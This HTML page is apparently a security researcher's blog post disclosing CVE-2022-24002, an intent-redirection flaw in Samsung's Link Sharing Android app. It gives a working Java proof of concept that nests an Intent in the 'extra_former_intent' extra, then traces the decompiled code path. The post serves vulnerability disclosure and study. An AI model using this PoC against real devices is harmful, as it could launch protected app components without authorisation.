<!doctype html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Begin Jekyll SEO tag v2.7.1 -->
<title>CVE-2022-24002 - Samsung Link Sharing Start Any Activity | YayWebsiteYay (I suck at titles)</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="CVE-2022-24002 - Samsung Link Sharing Start Any Activity" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="In 2021, as part of my research for Austin Pwn2Own 2021, I found a bug where the Link Sharing application could be abused to start either:" />
<meta property="og:description" content="In 2021, as part of my research for Austin Pwn2Own 2021, I found a bug where the Link Sharing application could be abused to start either:" />
<link rel="canonical" href="http://localhost:4000/research/2022/02/11/samsung-link-sharing-start-any-activity.html" />
<meta property="og:url" content="http://localhost:4000/research/2022/02/11/samsung-link-sharing-start-any-activity.html" />
<meta property="og:site_name" content="YayWebsiteYay (I suck at titles)" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-02-11T10:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="CVE-2022-24002 - Samsung Link Sharing Start Any Activity" />
<script type="application/ld+json">
{"headline":"CVE-2022-24002 - Samsung Link Sharing Start Any Activity","dateModified":"2022-02-11T10:00:00-05:00","datePublished":"2022-02-11T10:00:00-05:00","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/research/2022/02/11/samsung-link-sharing-start-any-activity.html"},"url":"http://localhost:4000/research/2022/02/11/samsung-link-sharing-start-any-activity.html","description":"In 2021, as part of my research for Austin Pwn2Own 2021, I found a bug where the Link Sharing application could be abused to start either:","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

    <link rel="stylesheet" href="/assets/css/style.css?v=59b28f893340e96ef2a6a36a7964a8aa747729d5">
    <script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
    <script src="/assets/js/respond.js"></script>
    <!--[if lt IE 9]>
      <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
    <!--[if lt IE 8]>
    <link rel="stylesheet" href="/assets/css/ie.css">
    <![endif]-->
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#353535">
<meta name="msapplication-navbutton-color" content="#353535">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->

<!-- Setup Google Analytics -->


<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->
  </head>
  <body>

    <div class="wrapper">

      <section>
        <div id="title">
          <h1>YayWebsiteYay (I suck at titles)</h1>
          <p>Sometimes I want to publish stuff unfiltered.</p>
          <hr>
          <span class="credits left">Project maintained by <a href="https://github.com/Yogehi">Yogehi</a></span>
          <span class="credits right">Hosted on GitHub Pages &mdash; Theme by <a href="https://twitter.com/mattgraham">mattgraham</a></span>
        </div>

        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">CVE-2022-24002 - Samsung Link Sharing Start Any Activity</h1>
    <p class="post-meta"><time class="dt-published" datetime="2022-02-11T10:00:00-05:00" itemprop="datePublished">
        Feb 11, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>In 2021, as part of my research for Austin Pwn2Own 2021, I found a bug where the Link Sharing application could be abused to start either:</p>

<ul>
  <li>Any exported activity</li>
  <li>Any protected activity within the Link Sharing application</li>
</ul>

<p>I submitted this bug to Samsung but they said someone else already reported it. Today Samsung publicly disclosed the CVE ID for this issue, and credit goes to Dawuge of Pangu Team. I guess it is safe for me to disclose my PoC for it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Intent intent = new Intent();
intent.setComponent(new ComponentName("com.samsung.android.app.simplesharing", "com.samsung.android.app.simplesharing.presentation.precondition.PreconditionActivity"));

Intent intent2 = new Intent();
intent2.setComponent(new ComponentName("com.sec.android.app.sbrowser", "com.sec.android.app.sbrowser.SBrowserLauncherActivity")); // replace with any other target component
intent2.setData(Uri.parse("https://www.f-secure.com"));
intent2.putExtra("yay", "boo");

Bundle bundle = new Bundle();
bundle.putInt("extra_request_code", 9001);
bundle.putParcelable("extra_former_intent", intent2);

intent.putExtras(bundle);

startActivity(intent);
</code></pre></div></div>

<h2 id="technical-details">Technical Details</h2>

<p>When <code class="language-plaintext highlighter-rouge">PreConditionActivity</code> is opened, the Intent is passed onto <code class="language-plaintext highlighter-rouge">com.samsung.android.app.simplesharing.presentation.precondition.PreconditionViewModel.handlePrecondition(intent)</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package com.samsung.android.app.simplesharing.presentation.precondition;

public final class PreconditionActivity extends AppCompatActivity {

    public void onCreate(Bundle bundle) {
        AndroidInjection.inject(this);
        ...
        PreconditionViewModel viewModel = getViewModel();
        ...
        viewModel.handlePrecondition(intent);
    }

    public final PreconditionViewModel getViewModel() {
        return (PreconditionViewModel) this.viewModel$delegate.getValue();
    }
</code></pre></div></div>
<p>The Intent is processed, and the parcelable extra <code class="language-plaintext highlighter-rouge">extra_former_intent</code> is stored in the variable <code class="language-plaintext highlighter-rouge">formerIntent</code>. This variable can then be called via the method <code class="language-plaintext highlighter-rouge">getFormerIntent()</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package com.samsung.android.app.simplesharing.presentation.precondition;

public final class PreconditionViewModel extends AndroidViewModel {

    private Intent formerIntent;

    public final void handlePrecondition(Intent intent) {
        if (!this.isInit) {
            this.isInit = true;
            if (isFromSdk(intent)) {
                this.callerType = CallerType.TYPE_SDK;
                if (enforceShowPermissionNotice()) {
                    setShouldEnforceShowPermissionNotice();
                } else {
                    setShouldRequestPermission();
                }
            } else if (isOptionalContactRequest(intent)) {
                setShouldRequestContactPermission();
            } else if (isOptionalCameraRequest(intent)) {
                setShouldRequestCameraPermission();
            } else {
                Intent intent2 = (Intent) intent.getParcelableExtra("extra_former_intent");
                this.formerIntent = intent2;
                ...
    }

    public final Intent getFormerIntent() {
        return this.formerIntent;
    }
</code></pre></div></div>

<p>Going back to the class <code class="language-plaintext highlighter-rouge">com.samsung.android.app.simplesharing.presentation.precondition.PreconditionActivity</code>, the method <code class="language-plaintext highlighter-rouge">startFormalIntentActivity()</code> is called which then retrieves the variable <code class="language-plaintext highlighter-rouge">formerIntent</code> via <code class="language-plaintext highlighter-rouge">getFormerIntent()</code>, and then calls class <code class="language-plaintext highlighter-rouge">com.samsung.android.app.simplesharing.presentation.common.util.NavigatorUtil</code> method <code class="language-plaintext highlighter-rouge">startActivityFromFormerIntent(Activity, Intent)</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package com.samsung.android.app.simplesharing.presentation.precondition;

public final class PreconditionActivity extends AppCompatActivity {

    public final void startFormalIntentActivity() {
        if (getViewModel().isProcessRestart()) {
            NavigatorUtil.startHistoryActivity$default(NavigatorUtil.INSTANCE, this, false, null, 6, null);
        } else {
            Intent formerIntent = getViewModel().getFormerIntent();
            if (formerIntent != null) {
                NavigatorUtil.INSTANCE.startActivityFromFormerIntent(this, formerIntent);
            }
        }
        finishWithSuccess();
    }
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">formerIntent</code> is finally passed to <code class="language-plaintext highlighter-rouge">startActivity(Activity, Intent)</code>, where the component in the <code class="language-plaintext highlighter-rouge">formerIntent</code> is used to start a new activity:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package com.samsung.android.app.simplesharing.presentation.common.util;

public final class NavigatorUtil {

    public final void startActivityFromFormerIntent(Activity activity, Intent intent) {
        Intent copyIntent = copyIntent(intent);
        if (intent.getClipData() != null) {
            copyIntent.setClipData(intent.getClipData());
            copyIntent.addFlags(1);
        }
        INSTANCE.startActivity(activity, copyIntent);
    }
</code></pre></div></div>

  </div><a class="u-url" href="/research/2022/02/11/samsung-link-sharing-start-any-activity.html" hidden></a>
</article>

      </section>

    </div>
  </body>
</html>